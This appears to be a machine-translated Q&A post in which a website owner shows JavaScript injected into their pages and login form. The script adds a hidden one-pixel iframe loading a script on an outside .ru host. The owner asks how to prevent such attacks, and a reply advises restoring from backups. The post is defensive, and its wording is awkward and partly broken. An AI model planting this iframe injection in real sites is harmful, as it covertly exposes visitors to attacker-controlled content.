今天早上加入到服務器頁我注意到,一些JavaScript已添加到我的託管網站。當我下載的網頁代碼就像 <!--04b037--><script type="text/javascript"language="javascript"> (function() { var ipexz = document.createElement('iframe'); ipexz.src = 'http://nypmivhy.ru/count5.php'; ipexz.style.position = 'absolute'; ipexz.style.border = '0'; ipexz.style.height = '1px'; ipexz.style.width = '1px'; ipexz.style.left = '1px'; ipexz.style.top = '1px'; if (!document.getElementById('ipexz')) { document.write('<div id=\'ipexz\'></div>'); document.getElementById('ipexz').appendChild(ipexz); }})();</script><!--/04b037-->
而在登錄頁面:Javascript代碼自動
(function() { var usyux = document.createElement('iframe'); usyux.src = 'http://nypmivhy.ru/count5.php'; usyux.style.position = 'absolute'; usyux.style.border = '0'; usyux.style.height = '1px'; usyux.style.width = '1px'; usyux.style.left = '1px'; usyux.style.top = '1px'; if (!document.getElementById('usyux')) { document.write('
'); document.getElementById('usyux').appendChild(usyux); }})();" method="post"> Email
我猜它的病毒/垃圾郵件攻擊。雖然我現在刪除了JavaScript代碼,但我想要如何阻止我的網站免受此類攻擊。注意:我的FTP密碼非常微弱。
你不「刪除」注入代碼後,您可以將該網站還原爲已知良好的備份,並立即採取措施防止重複進入。如果您的網站上的所有內容都沒有備份和版本控制,那麼您不僅浪費自己的時間,還會浪費自己的時間,而且還會浪費我們的一般互聯網時間。 – tripleee